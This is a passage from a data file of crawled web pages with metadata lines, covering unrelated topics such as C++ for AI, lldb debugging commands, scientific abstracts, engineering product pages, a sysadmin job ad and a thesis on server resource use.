capabilities and is widely used in AI applications that involve face detection and analysis. Integration with Other Languages C++ is often used in conjunction with other programming languages to develop AI and ML applications. Its ability to integrate seamlessly with other languages makes it a versatile choice for building complex systems. Here are some examples of how C++ integrates with other languages: - Python: Python is a popular language for AI and ML, thanks to its simplicity and extensive libraries. C++ can be used to write performance-critical parts of an AI or ML system, which can then be called from Python using language bindings or inter-process communication. - Java: Java is widely used in enterprise applications, and C++ can be integrated with Java through technologies like Java Native Interface (JNI). This integration allows developers to leverage the performance benefits of C++ in Java-based AI and ML systems. - R: R is a language commonly used for statistical computing and data analysis. C++ can be used to write custom R packages or extensions, providing performance improvements for computationally intensive tasks in AI and ML. Let’s explore some real-world examples where C++ has played a significant role in AI and ML: - Autonomous Vehicles: Autonomous vehicles rely heavily on AI and ML algorithms to perceive the environment and make decisions. C++ is often used in the development of autonomous vehicle systems due to its performance and efficiency. For example, the Apollo project by Baidu, which aims to build autonomous driving systems, extensively uses C++ for its core algorithms. - Speech Recognition: Speech recognition systems, such as those used in voice assistants, utilize AI and ML techniques to convert spoken language into text. C++ is often used in the development of speech recognition systems to optimize performance and handle real-time processing. For instance, the Kaldi project, a popular open-source speech recognition toolkit, is primarily implemented in C++. - Computer Vision: Computer vision involves analyzing and understanding visual data, such as images and videos. C++ is widely used in computer vision applications due to its performance and the availability of libraries like OpenCV. For example, the OpenPose project, which performs real-time multi-person keypoint detection, heavily relies on C++ and OpenCV. C++ plays a crucial role in the development of AI and ML applications, contributing to their performance, efficiency, and integration capabilities. Its low-level programming features, compiled nature, and efficient memory management make it an ideal choice for optimizing complex algorithms. Additionally, the availability of libraries and frameworks like OpenCV, TensorFlow, MLpack, and Dlib further enhances C++’s capabilities in AI and ML development. The ability to seamlessly integrate with other languages like Python, Java, and R expands the possibilities of building complex AI and ML systems. As AI and ML continue to advance, C++ will remain a valuable tool for developers in pushing the boundaries of these technologies.
systems_science
https://bristolfoodpolicycouncil.org/reframing-the-foodscape-the-emergent-world-of-urban-food-policy/
2023-10-04T02:40:43
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233511351.18/warc/CC-MAIN-20231004020329-20231004050329-00250.warc.gz
0.935062
241
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__89891846
en
by Ana Moragues-Faus, Kevin Morgan: Abstract. Cities are becoming key transition spaces where new food governance systems are being fashioned, creating ‘spaces of deliberation’ that bring together civil society, private actors, and local governments. In order to understand the potential of these new urban food policy configurations, this paper draws on urban political ecology scholarship as a critical lens to analyse governance-beyond-the-state processes and associated postpolitical configurations. Taking Bristol and Malmö as empirical case studies, the paper illustrates the different paths that cities are taking as they strive to fashion more sustainable urban foodscapes. The analysis highlights the contested nature of “sustainability” in transition studies and explores whether concerted action on the part of civil society and municipal government is capable of creating more inclusive food narratives. Although progressive political currents can be neutralised by incumbent elites, as theorists of the ‘postpolitical city’ have argued, these cities also show that the food system is a highly contested battleground in which the themes of sustainability and justice can help to mobilise progressive forces and open up a range of new political possibilities. You can access the full report here.
systems_science
https://www.pdmitoquant.eu/publications/
2020-12-05T07:45:29
s3://commoncrawl/crawl-data/CC-MAIN-2020-50/segments/1606141747323.98/warc/CC-MAIN-20201205074417-20201205104417-00694.warc.gz
0.853503
487
CC-MAIN-2020-50
webtext-fineweb__CC-MAIN-2020-50__0__122180196
en
Mitochondrial clusters are found at regions of high energy demand, allowing cells to meet local metabolic requirements while maintaining neuronal homeostasis. AMP-activated protein kinase (AMPK), a key energy stress sensor, responds to increases in AMP/ATP ratio by activating multiple signalling cascades to overcome the energetic deficiency. In many neurological conditions, the distal axon experiences energetic stress independent of the soma. Here, we used microfluidic devices to physically isolate these two neuronal structures and to investigate whether localised AMPK signalling influenced axonal mitochondrial transport. Nucleofection of primary cortical neurons, derived from E16 mouse embryos (both sexes), with mito-GFP allowed monitoring of the transport dynamics of mitochondria within the axon, by confocal microscopy. Pharmacological activation of AMPK at the distal axon (0.1 mM AICAR) induced a depression of the mean frequency, velocity and distance of retrograde mitochondrial transport in the adjacent axon. Anterograde mitochondrial transport was less sensitive to local AMPK stimulus, with the imbalance of bi-directional mitochondrial transport resulting in accumulation of mitochondria at the region of energetic stress signal. Mitochondria in the axon-rich white matter of the brain rely heavily on lactate as a substrate for ATP synthesis. Interestingly, localised inhibition of lactate uptake (10 nM AR-C155858) reduced mitochondrial transport in the adjacent axon in all parameters measured, similar to that observed by AICAR treatment. Co-addition of compound C restored all parameters measured to baseline levels, confirming the involvement of AMPK. This study highlights a role of AMPK signalling in the depression of axonal mitochondrial mobility during localised energetic stress. As the main providers of cellular energy, the dynamic transport of mitochondria within the neuron allows for clustering at regions of high energy demand. Here we investigate whether acute changes in energetic stress signal in the spatially isolated axon would alter mitochondrial transport in this local region. Both direct and indirect activation of AMP-activated protein kinase (AMPK) isolated to the distal axon induced a rapid, marked depression in local mitochondrial transport. This work highlights the ability of acute localised AMPK signalling to affect mitochondrial mobility within the axon, with important implications for white matter injury, axonal growth and axonal degeneration.
systems_science
http://debugging-with-lldb.blogspot.com/2013/07/lldb-starting-or-attaching-to-your.html
2019-04-25T22:54:29
s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578742415.81/warc/CC-MAIN-20190425213812-20190425235812-00456.warc.gz
0.901237
304
CC-MAIN-2019-18
webtext-fineweb__CC-MAIN-2019-18__0__67689904
en
To launch a program in lldb we use the " process launch" command or one of its built in aliases: (lldb) process launchYou can also attach to a process by process ID or process name. When attaching to a process by name, lldb also supports the " --waitfor" option which waits for the next process that has that name to show up, and attaches to it (lldb) process attach --pid 123After you launch or attach to a process, your process might stop somewhere: (lldb) process attach --name Sketch (lldb) process attach --name Sketch --waitfor (lldb) process attach -p 12345Note the line that says " Process 46915 Attaching Process 46915 Stopped 1 of 3 threads stopped with reasons: * thread #1: tid = 0x2c03, 0x00007fff85cac76a, where = libSystem.B.dylib`__getdirentries64 + 10, stop reason = signal = SIGSTOP, queue = com.apple.main-thread 1 of 3 threads stopped with reasons:" and the lines that follow it. In a multi-threaded environment it is very common for more than one thread to hit your breakpoint(s) before the kernel actually returns control to the debugger. In that case, you will see all the threads that stopped for some interesting reason listed in the stop message.
systems_science
https://telecomunlimited.com/access-control/
2024-03-03T13:12:38
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476374.40/warc/CC-MAIN-20240303111005-20240303141005-00561.warc.gz
0.941505
165
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__164669296
en
Telecom Unlimited provides IP-based door access control systems that allow authorized employees quick and convenient access to facilities, while at the same time restricting access to unauthorized people. A major benefit of access control is not having to re-key locks due to employee turnover, as access is controlled by rules configured in a server, which may be modified on a moment’s notice. We will custom-design your system based on requirements that will be identified with a site walk-through. Specifically, we will determine the most practical hardware based on door types, door quantity, reader requirements (HID, touchpad), and emergency egress requirements. These systems may be as simple as a single door at one site, or hundreds of doors covering multiple locations. The goal is to create a safe environment with an easily managed system.
systems_science
https://www.agropolis-kinrooi.be/en/projects/precision-agriculture/
2024-03-02T07:02:32
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947475757.50/warc/CC-MAIN-20240302052634-20240302082634-00493.warc.gz
0.934462
462
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__6261257
en
Here at Agropolis, we also work hard at our very own project: precision agriculture, a project sponsored by the Flemish Land Agency (VLM) and the Province of Limburg. Curious to find out what exactly this project entails? Find out here! Added ECO² value through precision demo Our precision agriculture project is financed by the Flemish Land Agency and the Province of Limburg. As part of the project, we are delving deeper into an area that has remained relatively unexplored so far together with PIBO Campus, PVL and the Agropolis Machinery Cooperative. “Precision agriculture involves looking for solutions to close the gap between what needs to be done on the field and the technologies we have access to nowadays. In doing so, the most important things are to take stock of what farmers need, and to map the technologies that are available. To name just one example, precision agriculture is making it possible to use technology for weed control. Using the appropriate equipment, we take a picture of the field and map the entire area. In doing so, we can identify the exact amount of weeds, and we can start protecting our crops in a highly targeted manner. We then use GPS systems to determine the exact driving lines. This also allows us to avoid overlaps with great precision, meaning resources are used much more efficiently and in a much more targeted way. And that has a positive impact on both quality and quantity”, Agropolis’ Kristof Das explains. “Aside from working more efficiently, working comfort is also improved. The huge number of hectares that would need to be checked on a regular basis are reduced to just a few hectares. This combination has led us to strongly believe that there is a genuine future for precision agriculture. Many farmers remain relatively unfamiliar with the concept, but this project aims to change that! We intend to do so using demos and workshops, both at Agropolis and on location.” “The techniques we discover while researching precision agriculture can be acquired by the machinery cooperative, removing any obstacles that might otherwise prevent our members from getting to explore precision agriculture. By using the scale of the cooperative (approx. 75 members), the individual cost for each farmer can be reduced”, according to Kristof.
systems_science
https://psirep.com/products/act-thermal-technical-services
2023-03-22T12:29:42
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943809.76/warc/CC-MAIN-20230322114226-20230322144226-00373.warc.gz
0.904154
660
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__143529910
en
ACT offers a complete range of thermal engineering services – everything from initial concept generation to product design to high volume production of a fully integrated thermal management solution – and everything in-between. We’re committed to serving our customers by providing the services they truly need. Our experienced engineering team and leading edge technology developers enable us to offer a broad range of services at a consistently high quality level. Further, because we operate under an efficient, disciplined program management structure, we can offer these services at very competitive prices. In all cases, we maintain strict confidentiality to protect our customer’s valuable information. We offer a variety of Thermal Management Product and Services including: THERMAL MANAGEMENT CONSULTING ACT’s thermal engineering experts have helped guide clients in the military, telecommunications, medical equipment, manufacturing and aerospace industries to a variety of effective and cost effective thermal solutions. Using our extensive product development and manufacturing experience, we offer feasibility studies to generate and evaluate potential thermal management solutions from many important aspects including: cost, performance, manufacturability and reliability. We can help you save time and avoid costly delays at the end of your project by identifying the correct thermal solution up front. We can do a trade study to determine which of multiple potential thermal solutions offers the best performance and value. DESIGN AND ANALYSIS ACT has a staff of thermal engineers who are fully competent in both CFD (Computational Fluid Dynamics) and heat transfer analysis. Our thermal engineers are fluent in commercial software packages and can also create or modify computational codes as required. ACT’s thermal engineering professionals have simulated thermal phenomenon at all lengths and scales including the atomic (Ab Initio, Molecular Dynamics), microscopic (Boltzmann Transport Equation, Phase Field Modeling) and macroscopic (CFD, FEA). ACT also develops custom codes for analyses involving multiple phases and components, including: heat pipes, heat sinks, vapor chambers two phase boiling flows, thermal storage using Phase Change Materials and chemical reaction mechanisms. Whether it’s a simple heat sink extrusion or a high heat flux pumped two phase loop, our engineers can design and specify a solution that is appropriate for your project and budget. Along with our in-house volume manufacturing, we offer custom thermal management component and system prototyping. We offer high quality, fast turnaround on heat pipes, vapor chambers, as well as full solutions including integration with Thermoelectric coolers, power electronics laser devices, etc. Along with passive thermal solutions such as heat pipes and phase change materials, ACT also builds thermal storage devices, pumped liquid and two phase systems. ACT has in-house volume manufacturing operations that are certified under ISO9001:2008 and AS 9100 C quality standards. We have a heat pipe manufacturing line that produces >250,000 heat pipes annually which are then integrated into a variety thermal management devices for military, aerospace, and commercial applications. Our laboratory includes a host of testing and characterization equipment from standard data acquisition systems to high temperature and high heat flux testing metrology equipment. Our experienced quality-conscious technicians ensure all testing is performed in accordance with industry standards
systems_science
http://ilevbare.com/pneumatic-load-cell-principle/
2018-09-19T13:21:30
s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267156224.9/warc/CC-MAIN-20180919122227-20180919142227-00253.warc.gz
0.902235
324
CC-MAIN-2018-39
webtext-fineweb__CC-MAIN-2018-39__0__1148768
en
Principle of Pneumatic Load Cell If a force is applied to one side of a diaphragm and an air pressure is applied to the other side, some particular value of pressure will be necessary to exactly balance the force. This pressure is proportional to the applied force. Pneumatic Load cell The main parts of a pneumatic load cell are as follows: - A corrugated diaphragm with its top surface attached with arrangements to apply force. - An air supply regulator, nozzle and a pressure gauge arranged as shown in figure. - A flapper arranged above the nozzle as shown in figure. Operation of Pneumatic Load cell The force to be measured is applied to the top side of the diaphragm. Due to this force, the diaphragm deflects and causes the flapper to shut-off the nozzle opening.Now an air supply is provided at the bottom of the diaphragm. As the flapper closes the nozzle opening, a back pressure results underneath the diagram. This back pressure acts on the diaphragm producing an upward force. Air pressure is regulated until the diaphragm returns to the pre-loaded position which is indicated by air which comes out of the nozzle. At this stage, the corresponding pressure indicated by the pressure gauge becomes a measure of the applied force when calibrated. - The pneumatic load cell can measure loads upto 2.5*10^3 Kgf. - The accuracy of this system is 0.5 percent of the full scale.
systems_science
https://www.hytekgb.com/international-products/international-fuel-management
2018-03-21T22:18:20
s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257647706.69/warc/CC-MAIN-20180321215410-20180321235410-00366.warc.gz
0.929503
370
CC-MAIN-2018-13
webtext-fineweb__CC-MAIN-2018-13__0__32455459
en
Hytek have been supplying fuelling equipment for over 32 years & fuel management systems for the past 17. As with all of Hytek’s products, the FC10 fuel management system has evolved & comes with web based software, allowing data to be securely accessed from any PC around the world. This automated fuel management system is ideal for small or large fleets, multi sites & multi user applications. The FC10 fuel management system is our own Hytek Engineered ALPHA pump with an integral fuel management system. We have added to our fuel management solutions with our FC20. A standalone system that can either be floor standing or wall mounted to a tank, & is able to be connected to up 4 new or 4 pre-existing pumps. Our fuel management solutions are all housed in stainless steel cabinets, enabling them to work in the harshest of environments from coastal locations to harsh sun burnt quarries, providing a 100% rust free future & come with indestructible data tags instead of keys or cards. The flexible report writer on our fuel management systems enable you to access a wide range of fuel usage analysis by vehicle, fuel type, time, department, KM/L & CO2 output. By adding an OLE gauge interfaced through the fuel management software an easy ‘LIVE’ tank consumption monitoring feed enables readings to be viewed & monitored from the comfort of the office via the web-based fuel management software. This generates an early warning in the event of a tank leakage, as well as receiving email & visual stock alerts when stock is running low. The software automatically logs fuel stock deliveries, & saves time as there is no need to go out to the tank for visual check of tank gauges. All of these features can be monitored from your phone, tablet or computer anywhere in the world.
systems_science
http://runetrack.com/forums/viewtopic.php?p=717
2017-04-26T13:43:47
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917121355.9/warc/CC-MAIN-20170423031201-00554-ip-10-145-167-34.ec2.internal.warc.gz
0.976713
466
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__168110569
en
I'm happy to announce that RuneTrack has now moved to a faster, more reliable server with significantly increased uptime! I'm aware that for the past couple months, the server has been continually sluggish from around 9:30am - 11:30am GMT. This downtime did not affect the majority of RuneTrack's users as it was during the early morning for those in the United States (5:30am - 7:30am Eastern US) and at about mid-day for Europeans. However, the downtime was unfortunately an issue for those in Australia, as it occurred during their peak playing hours in the evening (7:30pm - 9:30pm AEST). Additionally, other server slow-downs were causing minor errors to occur during some of the daily System Updates (though these were quickly fixed the next day). So, in order to maintain RuneTrack's quick and efficient services, I have now moved RuneTrack.com to a new, more reliable server, which has fully solved the downtime issue. I apologize for any trouble this downtime issue may have caused, but after extensive monitoring of the server, I'm happy to report that RuneTrack.com is now running at virtually 100% uptime for all timezones. Furthermore, the server move has fixed those minor errors during system updates, such that all aspects of the daily System Update now function exactly as they should. Additionally, the server move has also provided the site with a speed boost to allow for faster load times overall, as can be seen in an updated version of the Load Speed Improvement Chart (first used in the April 2, 2010 news post) below: Note: Average load time refers to the time it takes the server to process the page (displayed at the very bottom of every page). As you can see, RuneTrack's system has become significantly faster from where it was at the beginning of the year, and even just a few months ago, to the point where the load speed really can't get any noticeably faster. With this new server in place, I'd like to reaffirm RuneTrack's promise of providing quick, efficient, and bug-free stat tracking. Thanks again to everyone who's provided feedback about this issue to help solve it, and for all the continued support!
systems_science
https://allahdini.ir/
2022-05-22T19:45:59
s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662546071.13/warc/CC-MAIN-20220522190453-20220522220453-00688.warc.gz
0.935016
320
CC-MAIN-2022-21
webtext-fineweb__CC-MAIN-2022-21__0__7674445
en
Mobin Allahdini H. I’ve got my Master’s degree in Systems Architecture from Shahid Beheshti University and my B.Sc. in Hardware Engineering from K. N. Toosi University of Technology of Tehran. I am interested in FPGAs and hardware design, and have worked on spike sorting methods with Spartan6 FPGA. I have also done researches for improving spike sorting accuracy methods which resulted in a paper on this subject. - Mobin Allahdini Hasaroueiye, Dr. Hossein Hosseini-Nejad; An Online Unsupervised Spike Sorting Approach Based on Self Organizing Map. 7th Basic and Clinical Neuroscience Congress, Tehran, Iran, 2018. - In Jan. 2021 I joined Did Electronic Mobin as a hardware designer. I worked on communication interface protocols like UART and SPI. - In Dec. 2017, I became a member of the FPGA Lab in K. N. Toosi University of technology. I worked on brain signals and spikes there. I used Matlab for software simulations and Spartan FPGAs for hardware implementations. - In 2017 I spent my university internship project in Khatoon Abad Copper smelter Co. I was working as 1st line IT support there. - In 2014 I worked for Pyramid Co. for 6 months as a trainee software developer. I learned to develop software on several platforms and programming languages like C# and WPF.
systems_science
http://www.centennial-group.com/resources/growth-models/
2017-04-26T04:01:01
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917121153.91/warc/CC-MAIN-20170423031201-00067-ip-10-145-167-34.ec2.internal.warc.gz
0.904147
692
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__119888309
en
Repeatable Models to Measure Global GDP Growth Centennial’s models for growth draw scenarios and illustrate the consequences of a diverse range of long-term factors. Our proprietary models can be applied at the global or national levels—and consider a multitude of variables that are economic, policy-related and cultural in nature. The Centennial Growth Model GDP (total, per capita, and median per capita) is projected for 187 countries as a Cobb-Douglas function of labor force, capital stock, and total factor productivity. To better capture cohort-specific trends, labor is projected separately for men and women, each for seven age groups, using autoregressions. Capital stock is projected by estimating an initial capital stock for the earliest year possible and then adding yearly investment and subtracting yearly depreciation. For productivity growth, all countries begin with a default growth rate, which represents the advance of global best practice. In addition to this, failed states suffer a productivity growth penalty. In addition, research has shown that some growth differences between developing or middle-income countries can be successfully modeled by dividing them into two groups—“non-convergers” experiencing a stagnation of growth and fast-growing “convergers” whose productivity is quickly catching up to global best practice. The latter reflects technology leap-frogging, technology transfers, the diffusion of innovative management and operational research from advanced economies, etc. In the model, converging countries receive a boost in productivity growth. The US is taken as the global best practice, and the further behind the US productivity that a given converger’s is, the faster the catch up. For a selected base year, the model generates GDP in constant USD, PPP GDP in constant PPP dollars, and GDP at expected market exchange rates. It projects the latter by estimating movements of a country’s real exchange rate. This is calculated by estimating a hypothetical relationship between real exchange rates and the ratio of a country’s GDP PPP per capita to that of the US. In the model, a country’s actual projected real exchange rate converges towards the point in this hypothetical relationship that corresponds to its income. The model also projects the size of the middle and upper classes using GDP PPP. It assumes an income distribution for each country, distributes the nation’s GDP PPP to its citizens accordingly, and estimates what share of the nation’s income is available for consumption in order to quantify the size of each class. It also projects poverty and poverty-related indicators, and estimates other income distribution measures such as decline and percentile incomes. It estimates both income and consumption levels, by estimating consumption rates. Additionally, the model can project total bilateral trade between any two countries or regions. It also estimates infrastructure stocks, access, and investment requirements (new capacity, maintenance, and total) for ten sectors: Airports, Electricity, Fixed Broadband, Landlines, Mobile Phones, Ports, Rail, Roads, Sanitation, Water. The model is capable of estimating food consumption (total and per-capita) for various commodities, including Rice, Poultry, Fish, Fish Sauce, Beef, Fruit, Pork, Eggs, Maize, Casava, Tofu and Sugar. It can also estimate agricultural production. Finally, the model can incorporate assumptions about terms-of-trade changes.
systems_science
http://methodist.edu/jenzabar
2019-09-19T19:01:07
s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573570.6/warc/CC-MAIN-20190919183843-20190919205843-00120.warc.gz
0.913405
438
CC-MAIN-2019-39
webtext-fineweb__CC-MAIN-2019-39__0__183312960
en
Database Administrator: Mary L. Hupp Title III Grant Directive: Jenzabar Integrated Information Management System: The introduction of an integrated information management system will enable MU to engage our constituents (students, faculty, staff, and administrators) with one another in ways never before possible at our institution. Our inability to communicate timely, critical information across division and departmental lines and our lack of capacity to share decision-making information with our students is a primary barrier to student retention, success, and satisfaction. As part of our strategic planning, an MU task force appointed by the President, consisting of administrators, faculty, and staff, looked critically at our information system capacity and then began researching and interviewing possible vendors for an integrated system. Task force members unanimously recommended the Jenzabar Enterprise Management System (EMS), a system with a demonstrated track record of success at institutions similar to MU. We will begin by upgrading technology infrastructure including essential hardware (servers and uninterrupted power supplies), back-up hardware (one data domain), data storage software, and server software. All labor will be completed by the Office of Institutional Computing (OIC) without federal funding. Year-1 also will include initial data conversion activities and preliminary staff orientation and training. Jenzabar will assign a project liaison who will work with the Title III Database Manager to effect a two-year mapping, testing, and conversion process. Faculty and staff training provided by Jenzabar, beginning in Year-1, will continue (with expanded applications) throughYear-3. Primary conversion will include offices that directly impact students: admissions, registration, advising, student life, financial aid, and the major business management and reporting functions. In Year-2, end-user potential increases as we add an attendance module to alert students, faculty, and advisors of prospective retention problems. By Year-3, attention turns to the Constituent Relations Modules (CRM's) enabling students and faculty to utilize fully the potential of the EMS to communicate and share information. Faculty Advising procedures and strategies also will be revised inYear-3, strengthening both student-faculty relationships and student academic planning.
systems_science
https://www.math.colostate.edu/~bangerth/index.html
2023-09-22T10:49:00
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233506399.24/warc/CC-MAIN-20230922102329-20230922132329-00407.warc.gz
0.926641
524
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__166228333
en
Who I am After having studied in Stuttgart and Heidelberg (Germany); a Ph.D. in Heidelberg; a stop at ETH Zürich (Switzerland); a postdoc at the University of Texas at Austin (with joint positions at the Oden Institute for Computational Engineering and Sciences and the Institute for Geophysics); and eleven years as a Professor of Mathematics at Texas A&M University, I am now a professor in the Department of Mathematics and a professor (by courtesy) in the Department of Geosciences at Colorado State University. I am also a co-Editor-in-Chief of the ACM Transactions on Mathematical Software (TOMS). I consider myself a computational scientist. My field of work is developing methods and widely usable software for the numerical solution of partial differential equations by the finite element method – or, in different words: I develop the mathematical and software tools for simulating how solids, fluids, and gases move and deform. If you are interested in more about this, check out the links at the top of this page. Finite element software The concrete realization of my work is software. This includes deal.II, a finite element software library written in C++. I am the founder and, with others, principal author and maintainer of this open source library deal.II is used by several hundred researchers around the world and is part of the computing industry standard SPEC CPU2006 and SPEC CPU2017 benchmarks. My co-authors and I have received the J. H. Wilkinson Prize for Numerical Software for its creation. It has been used for numerical results in about 1,800 scientific papers covering practically all areas of the sciences and engineering. I wrote the basic blocks of this library in 1998 for my thesis, but it has been greatly extended since, by me and around 300 others around the world. It now has about 1,400,000 lines of code, and extensive documentation. I am also a principal author of ASPECT, an open source code for thermal convection with primary application to the simulation of convection in the Earth mantle. ASPECT is the basis of the integrated earth project of which I am the Principal Investigator. |bangerth @ colostate.edu| |Cell phone||++1 (512) 689 7194| Department of Mathematics 1874 Campus Delivery Fort Collins, CO 80523-1874
systems_science
https://kascomarine.com/employment/system-administrator/
2024-04-13T06:37:31
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816586.79/warc/CC-MAIN-20240413051941-20240413081941-00370.warc.gz
0.895069
1,024
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__36339322
en
Kasco Marine is seeking a full-time Mechanical Design Engineer at our home office in Prescott, WI. The System Administrator is a member of Kasco’s Shared Services team and is responsible for maintaining the technologies and systems that support our business operations. This is a key role tasked with enabling teams throughout the company and supporting business-critical systems. This role requires both the ability to dive deep into detail and take the broad view necessary to ensure that our systems are properly maintained and that we are realizing the full potential of our technology tools. The Sysadmin will be the primary point of contact in Kasco’s relationships with key technology partners, serving as a strong advocate for the company in discussions about the hardware, software, and systems that support our business. The ideal candidate will bring curiosity and a willingness to learn the business from every angle so that they can advise on best practices and contribute meaningfully to process improvement efforts. Kasco is a growing company, and this is a chance for the right person to step in and ensure that our systems not only keep pace but anticipate and enable our future growth. Essential Job Responsibilities - Maintain essential IT infrastructure, including operating systems, security tools, applications, servers, email systems, firewalls, phones, printers, laptops, desktops, and other hardware. - Perform Windows server administration tasks; help build, test, and maintain new servers. - Take responsibility for individual projects and tasks within larger business initiatives. - Monitor network security and perform regular tests; ensure security through access controls, backups, and firewalls. - Monitor data-center health and respond to hardware issues as they arise. - Serve as Kasco’s point person in our relationships with IT partners and contractors. - Work with internal and external partners to communicate project status and activities; manage upgrades, new releases. - Assist in addressing or routing help desk tickets with Kasco’s technology partners; troubleshoot issues and outages. - Provide technical support to employees; develop expertise to train staff on new technologies. - Build and maintain technical documentation, manuals, and IT policies. - Drive the management of users/groups, security permissions, group policies, print services, and monitoring resources. - Maintain networks and network file systems; end-to-end support of internet, intranet, and databases. - Perform routine and scheduled audits of all systems, including backups; maintain network integrations and connections. - Upgrade, install, and configure application software and computer hardware. - Coordinate and carry out workstation setup for employees in all departments. - Proven success in an IT role, preferably in system or network administration. - O365 admin experience. - Experience with or knowledge of operating systems, current equipment and technologies, enterprise backup and recovery procedures, systems performance-monitoring tools, active directories, and virtualization. - Knowledge of system security (e.g. intrusion detection systems) and data backup/recovery. - Familiarity with various operating systems and platforms. - Resourcefulness and commitment to problem solving and process improvement. - BS/BA in Information Technology, Computer Science or a related discipline. - Professional certification (e.g Microsoft Certified Systems Administrator(MCSA)). - Proficient in Microsoft Office. - Experience working with an ERP system. - Excellent verbal and written communication across all levels of the organization. - Works well under pressure; strong ability to multi-task and be a team player. - Must be a self-starter with a positive attitude and willingness to learn. - Ability to work effectively both independently and with a team and with multiple interruptions throughout the day. Requires occasional lifting of materials up to 40lbs. Required to sit or stand for long periods of time. Eligible employees are offered a competitive benefits package including: - Medical/dental/life/STD/LTD insurances - Paid time off - Paid holidays - Profit sharing - Advancement opportunities Send resume and cover letter to [email protected]. Kasco Marine is an Equal Opportunity Employer. About the Company Kasco Marine is a leading international supplier and innovator in the manufacture of aerators, diffused aeration, floating decorative fountains, de-icing products, circulators, and tank mixers. Kasco has a well-established reputation for quality products offered to the residential, aquaculture, commercial, industrial, municipal, public area, resort, and institutional industries. Kasco has been in business for over 50 years and is a small but aggressive and growing company located in Prescott, WI. We are dedicated to delivering exceptional service and support to our customers and creating an atmosphere of continuous improvement where everyone’s voice is heard.
systems_science
https://repozitorij.foi.unizg.hr/islandora/object/foi%3A3575
2024-03-03T11:55:05
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476374.40/warc/CC-MAIN-20240303111005-20240303141005-00886.warc.gz
0.79595
1,587
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__25899720
en
Zbog ubrzanog razvoja informacijske tehnologije su nastali složeni sustavi kao što su računarstvo u oblaku. Navedeni sustavi najčešće moraju imati visoku razinu dostupnosti podataka, odnosno moraju osigurati neprekidni rad poslovnih sustava. Kako bi se to postiglo prisutni su visoki kapitalni i operativni troškovi podatkovnih centara koji su neophodni za ovakvu vrstu usluga. Mnogobrojna istraživanja na ovu temu ukazuju kako su poslužitelji glavni uzročnici visokih troškova podatkovnih centara. Upravo se zbog toga njihovi resursi nastoje što učinkovitije iskoristiti. U istraživanju su navedene Web-farme kao primjer iz prakse koji potvrđuje da postoje sustavi čiji poslužitelji nedovoljno iskorištavaju svoje resurse, ali ih moraju imati kako bi osigurali visoku razinu dostupnosti sustava. Spomenuti visoki troškovi i nedovoljna iskoristivost postojećih računalnih resursa su glavna motivacija za ovo istraživanje. Nakon proučavanja dosadašnjih znanstvenih istraživanja, ali i rješenja iz prakse, utvrđeno je da ne postoji rješenje koje bi dovoljno učinkovito riješilo ovaj problem. U radu se predlaže novi model za automatiziranu i poboljšanu iskoristivost postojećih računalnih resursa bez potrebe za ponovnim pokretanjem poslužitelja koji rješava navedeni problem. Na temelju modela je napravljena aplikacija koja je validirana na primjeru Web-poslužitelja gdje je ovaj problem prepoznat. U radu se koristi istraživačka paradigma znanost o dizajnu (engl. Design Science Research Methodology, DSRM), koja se temelji na kreiranju novog artefakta što u ovom slučaju predstavlja novi model. Information technology is under constant innovation pressure to provide the highest level of data availability, i.e. the continuous functioning of operating systems. This is the very reason for an accelerated development of complex systems called cloud computing. One of the tasks of such solutions is to ensure high-level availability of complex systems and architecture. In order for such solutions to function properly, the high capital and operational costs of data centers are essential for this type of service. There are numerous studies which indicate that servers are the main cause of data centers’ high cost. As a result, the aim is to use servers, i.e. their resources more efficiently. This paper shows the examples from practice which confirm that there are systems whose servers insufficiently exploit their resources, but they must have them due to their importance. A concrete example of this problem are the Web Farms where, in order to achieve greater system availability, there is a greater amount of resources than is really needed, as confirmed by tools for measuring server loads. This approach allows the system to withstand sudden loads, which increases the level of system availability. The negative effect of such an approach is the increase in capital and operating costs due to a higher amount of computer resources. The mentioned high costs and inadequate utilization of the existing computer resources are at the same time the main motivation for this research. To solve this problem, it is necessary to have a system which would automatically allocate as much computer resources as the system needs, depending on its load and thereby taking into account its availability and consistency. During a detailed study of the current scientific research, as well as practical solutions, it has been found that there is no effective solution to this problem, which also served as an additional motivation for this research to be carried out. The existing solutions are lacking in that they are not dealing with how to use the existing resources more efficiently, but in adding new or migrating virtual servers to other physical servers in critical situations, which requires even larger numbers of computer resources. The second approach to solving this problem is process prioritization, i.e. that servers with the greatest need for resources are given the highest priority in the execution of the process. The disadvantage of this approach is that resources cannot be increased nor decreased, but only prioritized, which still results in the presence of unused resources. One of the disadvantages of the existing solutions is that it is not possible to add and subtract computer resources (CPU and memory) without the need to restart the server. A large number of existing solutions focus only on CPU or memory, but not on both. Due to all this, a decision was made to build a new model for an automated and improved utilization of the existing computing resources. The model will be verified by building an application that will also serve for validation on the Web server example where this problem was recognized. The research paradigm used in this research is the Design Science Research Methodology (DSRM), which has specific guidelines for evaluation and iteration within research projects. The methodology is based on the creation of a new artifact. In this case that is a new model which addresses these complex problems mentioned in this case. The Design Science Research Methodology consists of six sequential process steps, which are: identification of problems and motivations, a definition of goals, design, and development, presentation of solutions, evaluation and communication. Throughout these steps, numerous methods and 